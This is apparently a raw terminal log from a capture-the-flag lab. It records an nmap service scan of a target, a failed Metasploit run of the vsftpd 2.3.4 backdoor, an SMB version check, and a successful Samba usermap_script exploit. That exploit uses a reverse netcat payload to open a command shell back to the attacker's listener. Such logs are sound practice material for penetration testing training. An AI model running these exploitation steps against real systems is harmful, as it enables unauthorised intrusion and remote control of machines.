└──╼ [★]$ sudo nmap -sV 10.10.10.3 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 23:11 CDT Nmap scan report for 10.10.10.3 Host is up (0.0029s latency). Not shown: 996 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.24 seconds
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
[msf](Jobs:0 Agents:0) >> use exploit/unix/ftp/vsftpd_234_backdoor [*] No payload configured, defaulting to cmd/unix/interact [msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> show options
Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT no The local client port Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm l RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description ---- --------------- -------- -----------
Exploit target:
Id Name -- ---- 0 Automatic
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set RHOSTS 10.10.10.3 RHOSTS => 10.10.10.3 [msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.10.10.3:21 - USER: 331 Please specify the password. [*] Exploit completed, but no session was created.
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> use 0 [msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> show options
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm l THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> set RHOSTS 10.10.10.3 RHOSTS => 10.10.10.3 [msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> run
[*] 10.10.10.3:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional) [*] 10.10.10.3:445 - Host could not be identified: Unix (Samba 3.0.20-Debian) [*] 10.10.10.3: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> use 0 [*] No payload configured, defaulting to cmd/unix/reverse_netcat [msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> show options
Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT no The local client port Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm l RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 94.237.79.118 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Automatic
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set RHOSTS 10.10.10.3 RHOSTS => 10.10.10.3 [msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set lhost tun0 lhost => 10.10.14.22 [msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> run
[*] Started reverse TCP handler on 10.10.14.22:4444 [*] Command shell session 1 opened (10.10.14.22:4444 -> 10.10.10.3:41231) at 2024-08-10 23:31:16 -0500